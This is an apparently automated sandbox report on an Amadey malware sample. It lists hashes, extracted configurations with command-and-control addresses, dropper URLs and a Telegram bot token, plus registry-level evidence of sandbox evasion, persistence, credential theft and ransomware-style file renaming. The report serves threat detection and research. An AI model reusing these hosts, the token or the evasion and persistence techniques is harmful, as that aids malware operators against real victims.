amadey | 6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e

Analysis

max time kernel
73s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
22-02-2025 02:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
Size

2.1MB
MD5

6bc335ae3e7281ea3e46c5362fc2257a
SHA1

7c82356ab52d44d4c3682578e143c1663695018d
SHA256

6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e
SHA512

c92a6d620c89d7243acfc989c9c74c9e40c7b6199974e9cc0b47561d2621f2c4520d1047ba9bc3b7b787ccd8ebeeec65a398f7763c225896803b0593e1fc5413
SSDEEP

49152:iEfX+HJ9H1gO5nNcx/sygkWIA9XqHEwvece8tWNgLPHalhWm:Klt5nuJsyPOaEwGcztWObHYW

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

http://cobolrationumelawrtewarms.com

http://�� jlgenfekjlfnvtgpegkwr.xyz

Attributes

install_dir
a58456755d
install_file
Gxtuum.exe
strings_key
00fadbeacf092dfd58b48ef4ac68f826
url_paths
/3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

systembc

towerbingobongoboom.com

93.186.202.3

Attributes

dns
5.132.191.104

Extracted

Family

stealc

Botnet

reno

http://185.215.113.115

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

xworm

Version

5.0

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain

Extracted

Family

lumma

https://prideforgek.fun/api

https://governoagoal.pw/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Poverty Stealer Payload 1 IoCs

resource	yara_rule
behavioral2/memory/676-72-0x00000000001E0000-0x0000000000624000-memory.dmp	family_povertystealer

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0002000000022f97-4027.dat	family_xworm
behavioral2/memory/1264-4080-0x0000000000040000-0x0000000000070000-memory.dmp	family_xworm

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/2196-1920-0x0000000000E70000-0x00000000012E2000-memory.dmp	healer
behavioral2/memory/2196-1931-0x0000000000E70000-0x00000000012E2000-memory.dmp	healer
behavioral2/memory/2196-2975-0x0000000000E70000-0x00000000012E2000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer
Povertystealer family
povertystealer
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8QQOJj9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	archive.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	uXivbut.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	78869dfa0e.exe

Renames multiple (612) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 1 IoCs

flow	pid	Process
58	944	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
944	powershell.exe
3212	powershell.exe
4320	powershell.exe
4856	powershell.exe
2648	powershell.exe
3504	powershell.exe

Downloads MZ/PE file 17 IoCs

flow	pid	Process
17	2016	skotes.exe
17	2016	skotes.exe
17	2016	skotes.exe
17	2016	skotes.exe
17	2016	skotes.exe
17	2016	skotes.exe
17	2016	skotes.exe
17	2016	skotes.exe
17	2016	skotes.exe
17	2016	skotes.exe
17	2016	skotes.exe
53	2016	skotes.exe
53	2016	skotes.exe
53	2016	skotes.exe
53	2016	skotes.exe
46	3728	Gxtuum.exe
58	944	powershell.exe

Uses browser remote debugging 2 TTPs 2 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
556	chrome.exe
4364	msedge.exe

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	archive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	archive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	78869dfa0e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8QQOJj9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8QQOJj9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	78869dfa0e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	uXivbut.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	uXivbut.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Gxtuum.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	uXivbut.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	Gxtuum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 16 IoCs

pid	Process
2016	skotes.exe
2964	ebp51gY.exe
676	ftS1RPn.exe
1896	8QQOJj9.exe
4304	uXivbut.exe
3728	Gxtuum.exe
4976	skotes.exe
1156	archive.exe
4772	Gxtuum.exe
2524	dca61186a4.exe
4104	DF9PCFR.exe
1640	HrCoDRP.exe
992	continental.exe
3132	42ade0d979.exe
4364	78869dfa0e.exe
2196	Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	ftS1RPn.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	8QQOJj9.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	Gxtuum.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	archive.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	ebp51gY.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	uXivbut.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	Gxtuum.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	78869dfa0e.exe
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Software\Wine	skotes.exe

Loads dropped DLL 43 IoCs

pid	Process
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe
992	continental.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\42ade0d979.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090975101\\42ade0d979.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090976021\\am_no.cmd"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\78869dfa0e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091044001\\78869dfa0e.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00070000000240b0-1243.dat	autoit_exe
behavioral2/files/0x0007000000024164-2058.dat	autoit_exe
behavioral2/files/0x0007000000024170-2881.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
2576	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
2016	skotes.exe
2964	ebp51gY.exe
676	ftS1RPn.exe
1896	8QQOJj9.exe
4304	uXivbut.exe
3728	Gxtuum.exe
4976	skotes.exe
1156	archive.exe
4772	Gxtuum.exe
4364	78869dfa0e.exe
2196	Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4104 set thread context of 2380	4104	DF9PCFR.exe	106
PID 2524 set thread context of 3864	2524	dca61186a4.exe	104

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-40_altform-unplated_contrast-black.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageBadgeLogo.scale-150_contrast-black.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.scale-400_contrast-white.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-72_contrast-white.png.continental	continental.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\server\Xusage.txt.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-80.png.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\SmallTile.scale-125.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageSplashScreen.scale-400_contrast-black.png.continental	continental.exe
File created	C:\Program Files\7-Zip\Lang\bg.txt.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\rsod\word.x-none.msi.16.x-none.tree.dat.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\vreg\wordmui.msi.16.en-us.vreg.dat.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.scale-125.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchMedTile.contrast-white_scale-125.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-125_contrast-white.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\Logo.scale-125_contrast-white.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageSmallTile.scale-125_contrast-black.png.continental	continental.exe
File created	C:\Program Files\7-Zip\Lang\az.txt.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalAppList.scale-125_contrast-black.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchWideTile.contrast-black_scale-125.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-white\SmallTile.scale-125.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-125_contrast-high.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Spacer\1px.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-96_contrast-white.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\TinyTile.scale-100_contrast-black.png.continental	continental.exe
File created	C:\Program Files\ConvertToWait.rtf.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-100.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-125_contrast-white.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_BadgeLogo.scale-200.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\3.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\MediumTile.scale-100_contrast-white.png.continental	continental.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\hwrcommonlm.dat.continental	continental.exe
File created	C:\Program Files\7-Zip\Lang\ne.txt.continental	continental.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppPackageStoreLogo.scale-125_contrast-black.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-125_contrast-black.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-white\MedTile.scale-125.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\SmallTile.scale-125.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\Square150x150Logo.scale-150.png.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewCommentRTL.White.png.continental	continental.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-140.png.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-140.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\176.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\8.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\27.jpg.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ShareProvider_CopyLink24x24.scale-100.png.continental	continental.exe
File created	C:\Program Files\7-Zip\Lang\cs.txt.continental	continental.exe
File created	C:\Program Files\7-Zip\License.txt.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-180.png.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-100.png.continental	continental.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\index.html.continental	continental.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\hwritalm.dat.continental	continental.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\vk_swiftshader_icd.json.continental	continental.exe
File created	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Extensions\external_extensions.json.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.GrayF.png.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png.continental	continental.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\ScreenSketchSquare310x310Logo.scale-125_contrast-black.png.continental	continental.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\MedTile.scale-125_contrast-white.png.continental	continental.exe
File created	C:\Program Files\7-Zip\Lang\kk.txt.continental	continental.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Microsoft.NETCore.App.runtimeconfig.json.continental	continental.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	continental.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
File created	C:\Windows\Tasks\Gxtuum.job	uXivbut.exe
File created	C:\Windows\Tasks\Test Task17.job	archive.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
6064	3068	WerFault.exe	128

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8QQOJj9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	42ade0d979.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	78869dfa0e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uXivbut.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	archive.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dca61186a4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DF9PCFR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6f44899daeacc80a062cbd251ca23ec1261672bdd6a060d9f80654db2352370e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp3RCL3RIV7PQIGRJ0SJTIAPFXFFHGWAN8.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
824	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
8	taskkill.exe
3532	taskkill.exe
2652	taskkill.exe
2776	taskkill.exe
1016	taskkill.exe

